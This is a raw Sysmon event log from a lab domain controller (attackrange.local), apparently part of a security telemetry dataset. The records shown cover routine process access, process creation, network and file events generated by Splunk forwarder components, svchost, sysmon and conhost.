12:07:04.733{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010170Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:04.733{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010169Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:04.733{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010168Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:04.733{266CAFBE-6469-6064-0500-00000000AE01}624640C:\Windows\system32\csrss.exe{266CAFBE-65E8-6064-5901-00000000AE01}1828C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x800000000000000010167Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:04.733{266CAFBE-64ED-6064-D500-00000000AE01}56481476C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{266CAFBE-65E8-6064-5901-00000000AE01}1828C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x800000000000000010166Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:04.734{266CAFBE-65E8-6064-5901-00000000AE01}1828C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{266CAFBE-64ED-6064-D500-00000000AE01}5648C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x800000000000000010165Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:03.633{266CAFBE-64F5-6064-0301-00000000AE01}6500C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-892.attackrange.local53677-false10.0.1.12-8000- 23542300x800000000000000010164Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:04.405{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=815EC4B1BF8D1960F6EFF375248DB2C9,SHA256=C8193AEB47DAB0C6ABAB0AA116DADC77F03F7896A935B99092930BAAEB6465BF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000010174Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:05.467{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AE44867B90AB807761ECD06DCF7F3A77,SHA256=EAB2868FBBE450747AB66FCD5FF413EFD961CB33C36C621296ABD83546981B15,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000010184Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:06.498{266CAFBE-65EA-6064-5A01-00000000AE01}61763560C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{266CAFBE-64ED-6064-D500-00000000AE01}5648C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x800000000000000010183Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:06.482{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8040BDF174C7E8AD51D9120647B2244B,SHA256=699761833AEA4638C57B2BEB547B2F1CBDB8CBDC50518F729239F69B43BF1D42,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000010182Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:06.342{266CAFBE-64EE-6064-D900-00000000AE01}53082340C:\Windows\system32\conhost.exe{266CAFBE-65EA-6064-5A01-00000000AE01}6176C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010181Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:06.342{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010180Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:06.342{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010179Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:06.342{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010178Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:06.342{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010177Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:06.342{266CAFBE-6469-6064-0500-00000000AE01}624740C:\Windows\system32\csrss.exe{266CAFBE-65EA-6064-5A01-00000000AE01}6176C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x800000000000000010176Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:06.342{266CAFBE-64ED-6064-D500-00000000AE01}56481476C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{266CAFBE-65EA-6064-5A01-00000000AE01}6176C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x800000000000000010175Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:06.342{266CAFBE-65EA-6064-5A01-00000000AE01}6176C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{266CAFBE-64ED-6064-D500-00000000AE01}5648C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000010203Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:07.935{266CAFBE-65EB-6064-5C01-00000000AE01}48646864C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{266CAFBE-64ED-6064-D500-00000000AE01}5648C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010202Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:07.763{266CAFBE-64EE-6064-D900-00000000AE01}53082340C:\Windows\system32\conhost.exe{266CAFBE-65EB-6064-5C01-00000000AE01}4864C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010201Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:07.763{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010200Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:07.763{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010199Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:07.763{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010198Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:07.763{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010197Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:07.763{266CAFBE-6469-6064-0500-00000000AE01}6241132C:\Windows\system32\csrss.exe{266CAFBE-65EB-6064-5C01-00000000AE01}4864C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x800000000000000010196Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:07.763{266CAFBE-64ED-6064-D500-00000000AE01}56481476C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{266CAFBE-65EB-6064-5C01-00000000AE01}4864C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x800000000000000010195Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:07.764{266CAFBE-65EB-6064-5C01-00000000AE01}4864C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{266CAFBE-64ED-6064-D500-00000000AE01}5648C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000010194Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:07.498{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3F12FE237C80F5D90AA9A407DB802D88,SHA256=F80F708FAE590BB76DBD9AE02186BFF94382CFB81D032C4D7C619599B436F7BB,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000010193Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:07.170{266CAFBE-65EB-6064-5B01-00000000AE01}39806596C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{266CAFBE-64ED-6064-D500-00000000AE01}5648C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010192Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:07.013{266CAFBE-64EE-6064-D900-00000000AE01}53082340C:\Windows\system32\conhost.exe{266CAFBE-65EB-6064-5B01-00000000AE01}3980C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010191Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 